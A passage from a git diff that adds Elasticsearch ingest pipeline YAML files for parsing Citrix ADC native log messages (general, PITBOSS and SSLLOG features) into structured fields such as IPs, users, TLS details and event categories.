convert_l7_threshold_breach_max_serverside_latency_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.min_l7_latency + tag: convert_min_l7_latency_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.clientside.packet_retransmits + tag: convert_clientside_packet_retransmits_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.serverside_packet_retransmits + tag: convert_serverside_packet_retransmits_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.clientside.jitter + tag: convert_clientside_jitter_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.serverside_jitter + tag: convert_serverside_jitter_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.startup_duration + tag: convert_startup_duration_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.app.process_id + tag: convert_app_process_id_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.clientside.rtt + tag: convert_clientside_rtt_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.serverside.rtt + tag: convert_serverside_rtt_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.ica_rtt + tag: convert_ica_rtt_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_latency.waittime + tag: convert_l7_latency_waittime_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - grok: + if: ctx.citrix_adc?.log?.client_version != null && ctx.citrix_adc.log.client_version != '' + tag: grok_protocol_version + field: citrix_adc.log.client_version + patterns: + - "^%{DATA:tls.version_protocol}v%{DATA:tls.version}$" + ignore_failure: true +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/native.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/native.yml new file mode 100644 index 00000000000..4bbcd574c9b --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/native.yml @@ -0,0 +1,416 @@ +--- +description: Pipeline for Citrix Native messages. +processors: + - set: + field: citrix.cef_format + tag: set_cef_format + value: false + - grok: + description: Extract native header and message. + tag: grok_detail + field: citrix.detail + patterns: + - '^%{SPACE}%{HEADER} : %{DATA:_tmp.details} : +"%{GREEDYDATA:citrix.extended.message}"' + - '^%{SPACE}%{HEADER} : %{DATA:_tmp.details} : +%{GREEDYDATA:citrix.extended.message}' + pattern_definitions: + HEADER: '(?:<%{NUMBER}>%{SPACE})?%{NATIVE_TIMESTAMP:_tmp.timestamp_native} %{WORD:event.timezone} (?:%{SYSLOGHOST:citrix.host} )?%{INT}-PPE-%{INT}' + NATIVE_TIMESTAMP: '(?:%{MONTHNUM}/%{MONTHDAY}/%{YEAR}|%{YEAR}/%{MONTHNUM}/%{MONTHDAY}):%{HOUR}:%{MINUTE}:%{SECOND}' + - grok: + description: Parse out details. + tag: grok_tmp_details + field: _tmp.details + patterns: + - '^%{DEFAULT:_tmp.default}?%{WORD:citrix.device_event_class_id} %{GREEDYDATA:citrix.name} %{INT:event.id} %{INT:event.severity}$' + pattern_definitions: + DEFAULT: 'default ' + - set: + field: event.category + tag: set_event_category_network + if: ctx.citrix?.device_event_class_id != null && !['UI','CLI','GUI','API','CONSOLE','AAA','SSLVPN'].contains(ctx.citrix.device_event_class_id.toUpperCase()) + value: [network] + - set: + field: event.category + tag: set_event_category_authentication + if: ctx.citrix?.device_event_class_id != null && ['AAA','SSLVPN'].contains(ctx.citrix.device_event_class_id.toUpperCase()) + value: [authentication] + - set: + field: event.type + tag: set_event_type_info + if: ctx.citrix?.device_event_class_id != null && !['TCP','UI','CLI','GUI','API','CONSOLE'].contains(ctx.citrix.device_event_class_id.toUpperCase()) + value: [info] + - set: + field: event.type + tag: set_event_category + if: ctx.citrix?.device_event_class_id != null && ['TCP'].contains(ctx.citrix.device_event_class_id.toUpperCase()) + value: [end,connection] + - set: + field: event.category + tag: set_event_category_process + if: ctx.citrix?.device_event_class_id != null && ['UI','CLI','GUI','API','CONSOLE'].contains(ctx.citrix.device_event_class_id.toUpperCase()) + value: [process] + - set: + field: event.type + tag: set_event_type_start + if: ctx.citrix?.device_event_class_id != null && ['UI','CLI','GUI','API','CONSOLE'].contains(ctx.citrix.device_event_class_id.toUpperCase()) + value: [start] + - grok: + description: Extract fields from message of SUBSCRIBER, URLFILT, UI, CLI, GUI, API, CONSOLE and AAA feature. + tag: grok_subscriber_urlfilt_ui_cli_gui_api_console_aaa_feature + field: citrix.extended.message + patterns: + - '^Source %{IP:citrix_adc.log.source.ip} - Destination %{IP:citrix_adc.log.destination.ip} URL %{DATA:citrix_adc.log.url} - Category %{DATA:citrix_adc.log.category} - Category%{SPACE}group %{DATA:citrix_adc.log.category_group} - Reputation %{INT:citrix_adc.log.reputation} - Policy%{SPACE}action %{WORD:citrix_adc.log.policy_action}$' + - '^User %{USER:citrix_adc.log.user} -( ADM_User %{DATA:citrix_adc.log.adm_user} -)? Remote_ip %{IP:citrix_adc.log.remote_ip} - Command \"%{DATA:citrix_adc.log.command}\" - Status \"%{DATA:citrix_adc.log.status}\"$' + - '^Session %{GREEDYDATA:citrix_adc.log.session}$' + - '^User%{SPACE}Name%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.username}$' + - '^Failure%{SPACE}Reason%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.failure_reason}$' + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Failure_reason \"%{DATA:citrix_adc.log.failure_reason}\" - Browser %{DATA:citrix_adc.log.browser}$' + - '^Extracted_groups \"%{GREEDYDATA:citrix_adc.log.groups}\"$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - set: + field: citrix.default_class + tag: set_default_class + value: true + if: ctx._tmp?.default == 'default ' # The trailing space is intended. + - pipeline: + name: '{{ IngestPipeline "tcp_and_acl_feature" }}' + tag: pipeline_tcp_and_acl_feature + if: ctx.citrix?.device_event_class_id != null && (ctx.citrix.device_event_class_id == "TCP" || ctx.citrix.device_event_class_id == "ACL") + - pipeline: + name: '{{ IngestPipeline "alg_feature" }}' + tag: pipeline_alg_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "ALG" + - pipeline: + name: '{{ IngestPipeline "sslvpn_and_aaatm_feature" }}' + tag: pipeline_sslvpn_and_aaatm_feature + if: ctx.citrix?.device_event_class_id != null && (ctx.citrix.device_event_class_id == "SSLVPN" || ctx.citrix.device_event_class_id == "AAATM") + - pipeline: + name: '{{ IngestPipeline "ci_feature" }}' + tag: pipeline_ci_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "CI" + - pipeline: + name: '{{ IngestPipeline "ssllog_feature" }}' + tag: pipeline_ssllog_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "SSLLOG" + - pipeline: + name: '{{ IngestPipeline "transform_feature" }}' + tag: pipeline_transform_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "TRANSFORM" + - pipeline: + name: '{{ IngestPipeline "ica_feature" }}' + tag: pipeline_ica_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "ICA" + - pipeline: + name: '{{ IngestPipeline "appfw_feature" }}' + tag: pipeline_appfw_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "APPFW" + - pipeline: + name: '{{ IngestPipeline "cvpn_feature" }}' + tag: pipeline_cvpn_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "CVPN" + - pipeline: + name: '{{ IngestPipeline "bot_feature" }}' + tag: pipeline_bot_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "BOT" + - pipeline: + name: '{{ IngestPipeline "pitboss_feature" }}' + tag: pipeline_pitboss_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "PITBOSS" + - pipeline: + name: '{{ IngestPipeline "dns_and_ssli_feature" }}' + tag: pipeline_dns_and_ssli_feature + if: ctx.citrix?.device_event_class_id != null && (ctx.citrix.device_event_class_id == "DNS" || ctx.citrix.device_event_class_id == "SSLI") + - convert: + field: citrix_adc.log.client_ip + tag: convert_client_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.client_ip != null && ctx.citrix_adc?.log.client_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.outcome + tag: set_event_outcome_success + value: success + if: ctx.citrix_adc?.log?.status != null && ctx.citrix_adc.log.status.toLowerCase() == 'success' + - set: + field: event.outcome + tag: set_event_outcome_failure + value: failure + if: ctx.citrix_adc?.log?.status != null && ctx.citrix_adc.log.status.toLowerCase() == 'failure' + - set: + field: event.outcome + tag: set_event_outcome_failure + value: failure + if: ctx.citrix?.name != null && ctx.citrix.name == "LOGIN_FAILED" + - set: + field: client.ip + tag: set_client_ip_from_client_ip + copy_from: citrix_adc.log.client_ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.ip + tag: convert_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.destination?.ip != null && ctx.citrix_adc.log.destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_destination_ip + copy_from: citrix_adc.log.destination.ip + ignore_empty_value: true + - set: + field: event.reason + tag: set_event_reason_from_failure_reason + copy_from: citrix_adc.log.failure_reason + ignore_empty_value: true + - set: + field: group.name + tag: set_group_name_from_groups + copy_from: citrix_adc.log.groups + ignore_empty_value: true + - set: + field: process.command_line + tag: set_process_command_line_from_command + copy_from: citrix_adc.log.command + ignore_empty_value: true + - convert: + field: citrix_adc.log.remote_ip + tag: convert_remote_ip_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.remote_ip != null && ctx.citrix_adc?.log.remote_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_remote_ip + copy_from: citrix_adc.log.remote_ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.ip + tag: convert_source_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.source?.ip != null && ctx.citrix_adc.log.source.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_source_ip + copy_from: citrix_adc.log.source.ip + ignore_empty_value: true + - set: + field: url.original + tag: set_url_original_from_url + copy_from: citrix_adc.log.url + ignore_empty_value: true + - set: + field: user_agent.original + tag: set_user_agent_original_from_browser + copy_from: citrix_adc.log.browser + ignore_empty_value: true + - user_agent: + field: user_agent.original + if: ctx.user_agent?.original != null && ctx.user_agent.original != '' + tag: 'user_agent_processor' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag fail-{{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: user.name + tag: set_user_name_from_user + copy_from: citrix_adc.log.user + ignore_empty_value: true + - set: + field: user.name + tag: set_user_name_from_username + copy_from: citrix_adc.log.username + ignore_empty_value: true + - convert: + field: citrix_adc.log.reputation + tag: convert_reputation_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - lowercase: + field: event.action + tag: lowercase_event_action + ignore_missing: true + - lowercase: + field: network.protocol + tag: lowercase_network_protocol + ignore_missing: true + - lowercase: + field: network.transport + tag: lowercase_network_transport + ignore_missing: true + - append: + field: related.ip + tag: append_source_ip_into_related_ip + value: '{{{source.ip}}}' + allow_duplicates: false + if: ctx.source?.ip != null + - append: + field: related.ip + tag: append_destination_ip_into_related_ip + value: '{{{destination.ip}}}' + allow_duplicates: false + if: ctx.destination?.ip != null + - append: + field: related.ip + tag: append_destination_nat_ip_into_related_ip + value: '{{{destination.nat.ip}}}' + allow_duplicates: false + if: ctx.destination?.nat?.ip != null + - append: + field: related.ip + tag: append_source_nat_ip_into_related_ip + value: '{{{source.nat.ip}}}' + allow_duplicates: false + if: ctx.source?.nat?.ip != null + - append: + field: related.ip + tag: append_server_ip_into_related_ip + value: '{{{server.ip}}}' + allow_duplicates: false + if: ctx.server?.ip != null + - append: + field: related.ip + tag: append_client_ip_into_related_ip + value: '{{{client.ip}}}' + allow_duplicates: false + if: ctx.client?.ip != null + - append: + field: related.ip + tag: append_ip_address_into_related_ip + value: '{{{citrix_adc.log.ip_address}}}' + allow_duplicates: false + if: ctx.citrix_adc?.log?.ip_address != null + - append: + field: related.ip + tag: append_original_destination_ip_into_related_ip + value: '{{{citrix_adc.log.original_destination.ip}}}' + allow_duplicates: false + if: ctx.citrix_adc?.log?.original_destination?.ip != null + - append: + field: related.ip + tag: append_ssl_relay_address_into_related_ip + value: '{{{citrix_adc.log.ssl_relay.address}}}' + allow_duplicates: false + if: ctx.citrix_adc?.log?.ssl_relay?.address != null + - append: + field: related.user + tag: append_user_name_into_related_user + value: '{{{user.name}}}' + allow_duplicates: false + if: ctx.user?.name != null + - append: + field: related.user + tag: append_user_name_into_related_user + value: '{{{source.user.name}}}' + allow_duplicates: false + if: ctx.source?.user?.name != null + - append: + field: related.user + tag: append_user_name_into_related_user + value: '{{{destination.user.name}}}' + allow_duplicates: false + if: ctx.destination?.user?.name != null + - remove: + field: + - citrix_adc.log.action + - citrix_adc.log.browser + - citrix_adc.log.bytes.received + - citrix_adc.log.bytes.sent + - citrix_adc.log.callee.domain_name + - citrix_adc.log.callee.user_name + - citrix_adc.log.caller.domain_name + - citrix_adc.log.caller.user_name + - citrix_adc.log.cipher_suite + - citrix_adc.log.client_ip + - citrix_adc.log.client_port + - citrix_adc.log.clientside.rxbytes + - citrix_adc.log.clientside.txbytes + - citrix_adc.log.closure_reason + - citrix_adc.log.code + - citrix_adc.log.command + - citrix_adc.log.delink_time + - citrix_adc.log.destination.ip + - citrix_adc.log.destination.port + - citrix_adc.log.domain + - citrix_adc.log.domain_name + - citrix_adc.log.end_time + - citrix_adc.log.errmsg + - citrix_adc.log.error_code + - citrix_adc.log.failure_reason + - citrix_adc.log.group + - citrix_adc.log.groups + - citrix_adc.log.hostname + - citrix_adc.log.html_url + - citrix_adc.log.icap_server.ip + - citrix_adc.log.icap_server.port + - citrix_adc.log.infomsg + - citrix_adc.log.issuer_name + - citrix_adc.log.matched_url + - citrix_adc.log.method + - citrix_adc.log.nat.ip + - citrix_adc.log.nat.port + - citrix_adc.log.natted.ip + - citrix_adc.log.natted.port + - citrix_adc.log.nsica_session.client.ip + - citrix_adc.log.nsica_session.client.port + - citrix_adc.log.nsica_session.server.ip + - citrix_adc.log.nsica_session.server.port + - citrix_adc.log.origin_server.ip + - citrix_adc.log.origin_server.port + - citrix_adc.log.process.id + - citrix_adc.log.process.name + - citrix_adc.log.protocol + - citrix_adc.log.reason + - citrix_adc.log.referer_header + - citrix_adc.log.remote_ip + - citrix_adc.log.request.path + - citrix_adc.log.response.code + - citrix_adc.log.rewritten_url + - citrix_adc.log.rule_id + - citrix_adc.log.server.ip + - citrix_adc.log.source.ip + - citrix_adc.log.source.port + - citrix_adc.log.start_time + - citrix_adc.log.subject_name + - citrix_adc.log.total_bytes_received + - citrix_adc.log.total_bytes_send + - citrix_adc.log.translated_destination.ip + - citrix_adc.log.translated_destination.port + - citrix_adc.log.transport + - citrix_adc.log.url + - citrix_adc.log.user + - citrix_adc.log.username + - citrix_adc.log.vserver.ip + - citrix_adc.log.vserver.port + tag: remove_custom_duplicate_fields + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields')) +on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/pitboss_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/pitboss_feature.yml new file mode 100644 index 00000000000..0c5c417b7ac --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/pitboss_feature.yml @@ -0,0 +1,72 @@ +--- +description: Pipeline for Citrix Native messages of PITBOSS feature. +processors: + - grok: + description: Extract fields from message of PITBOSS feature. + tag: grok_pitboss_feature + field: citrix.extended.message + patterns: + - '^Adding pitboss watch on \(%{INT:citrix_adc.log.watch_id}\)$' + - '^Deleting watch on \(%{INT:citrix_adc.log.watch_id}\)$' + - '^proc \(%{INT:citrix_adc.log.process.id}\) \(%{DATA:citrix_adc.log.process.name}\) has had its maximum number of restarts \(%{INT:citrix_adc.log.max_restarts}\), rebooting the system$' + - '^Restarting process old pid \(%{INT:citrix_adc.log.old_pid}\) action \(%{DATA:citrix_adc.log.action}\)$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - set: + field: event.action + tag: set_event_action_from_action + copy_from: citrix_adc.log.action + ignore_empty_value: true + - set: + field: process.name + tag: set_process_name_from_process_name + copy_from: citrix_adc.log.process.name + ignore_empty_value: true + - convert: + field: citrix_adc.log.process.id + tag: convert_process_id_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: process.pid + tag: set_process_pid_from_process_id + copy_from: citrix_adc.log.process.id + ignore_empty_value: true + - convert: + field: citrix_adc.log.max_restarts + tag: convert_max_restarts_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.old_pid + tag: convert_old_pid_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.watch_id + tag: convert_watch_id_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ssllog_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ssllog_feature.yml new file mode 100644 index 00000000000..8d717aa4108 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ssllog_feature.yml @@ -0,0 +1,216 @@ +--- +description: Pipeline for Citrix Native messages of SSLLOG feature. +processors: + - grok: + description: Extract fields from message of SSLLOG feature. + tag: grok_ssllog_feature + field: citrix.extended.message + patterns: + - '^Backend%{SPACE}SPCBId %{NUMBER:citrix_adc.log.spcb_id:int} - Server%{SPACE}IP %{IP:citrix_adc.log.server.ip} - Server%{SPACE}Port %{NUMBER:citrix_adc.log.server.port:int} - Protocol%{SPACE}Version %{DATA:citrix_adc.log.protocol_version} - Cipher%{SPACE}Suite \"%{DATA:citrix_adc.log.cipher_suite}\" - Session %{DATA:citrix_adc.log.session}(%{SPACE}- %{WORD:citrix_adc.log.server_authentication} -%{SPACE}SerialNumber \"%{DATA:citrix_adc.log.serial_number}\" - SignatureAlgorithm \"%{DATA:citrix_adc.log.signature_algorithm}\" - ValidFrom \"%{DATA:citrix_adc.log.valid_from}\" - ValidTo \"%{DATA:citrix_adc.log.valid_to}\" - HandshakeTime %{INT:citrix_adc.log.handshake_time} ms)?$' + - '^Certificate%{SPACE}Key%{SPACE}Pair %{DATA:citrix_adc.log.certificate_key_pair} - Days%{SPACE}To%{SPACE}Expire %{NUMBER:citrix_adc.log.days_to_expire:int}$' + - '^SPCBId %{NUMBER:citrix_adc.log.spcb_id:int} - Issuer%{SPACE}Name \"%{GREEDYDATA:citrix_adc.log.issuer_name}\"$' + - '^SPCBId %{NUMBER:citrix_adc.log.spcb_id:int} - Subject%{SPACE}Name \"%{GREEDYDATA:citrix_adc.log.subject_name}\"$' + - '^crl_name %{DATA:citrix_adc.log.crl_name} - server_ip %{IP:citrix_adc.log.server.ip} - server_port %{NUMBER:citrix_adc.log.server.port:int} - method %{WORD:citrix_adc.log.method} - ldapscope %{WORD:citrix_adc.log.ldap_scope}$' + - '^Domainname %{DATA:citrix_adc.log.domain_name} Ipaddress %{IP:citrix_adc.log.ip_address}$' + - '^SPCBId %{NUMBER:citrix_adc.log.spcb_id:int} - ClientIP %{IP:citrix_adc.log.client_ip} - ClientPort %{NUMBER:citrix_adc.log.client_port} - VserverServiceIP %{IP:citrix_adc.log.vserver.ip} - VserverServicePort %{NUMBER:citrix_adc.log.vserver.port} - ClientVersion %{DATA:citrix_adc.log.client_version} - CipherSuite \"%{GREEDYDATA:citrix_adc.log.cipher_suite}\"( - )?Session %{WORD:citrix_adc.log.session}(%{SPACE}- HandshakeTime %{INT:citrix_adc.log.handshake_time} ms)?( - Reason \"%{GREEDYDATA:citrix_adc.log.reason}\")?$' + - '^%{GREEDYDATA:citrix_adc.log.message}$' + ignore_failure: true + - date: + field: citrix_adc.log.valid_from + tag: date_valid_from + target_field: citrix_adc.log.valid_from + formats: + - MMM dd HH:mm:ss yyyy z + - MMM d HH:mm:ss yyyy z + if: ctx.citrix_adc?.log?.valid_from != null && ctx.citrix_adc.log.valid_from != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: citrix_adc.log.valid_to + tag: date_valid_to + target_field: citrix_adc.log.valid_to + formats: + - MMM dd HH:mm:ss yyyy z + - MMM d HH:mm:ss yyyy z + if: ctx.citrix_adc?.log?.valid_to != null && ctx.citrix_adc.log.valid_to != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: http.request.method + tag: set_http_request_method_from_method + copy_from: citrix_adc.log.method + ignore_empty_value: true + - convert: + field: citrix_adc.log.server.ip + tag: convert_server_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.server?.ip != null && ctx.citrix_adc.log.server.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_server_ip + copy_from: citrix_adc.log.server.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.server.port + tag: convert_server_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_server_port + copy_from: citrix_adc.log.server.port + ignore_empty_value: true + - set: + field: user.domain + tag: set_user_domain_from_domain_name + copy_from: citrix_adc.log.domain_name + ignore_empty_value: true + - convert: + field: citrix_adc.log.spcb_id + tag: convert_spcb_id_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.days_to_expire + tag: convert_days_to_expire_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.ip_address + tag: convert_ip_address_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.ip_address != null && ctx.citrix_adc.log.ip_address != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.client_ip + tag: convert_client_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.client_ip != null && ctx.citrix_adc?.log.client_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: client.ip + tag: set_client_ip_from_client_ip + copy_from: citrix_adc.log.client_ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.client_port + tag: convert_client_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: client.port + tag: set_client_port_from_client_port + copy_from: citrix_adc.log.client_port + ignore_empty_value: true + - convert: + field: citrix_adc.log.vserver.ip + tag: convert_vserver_ip_to_ip + type: ip + ignore_missing: true + if: 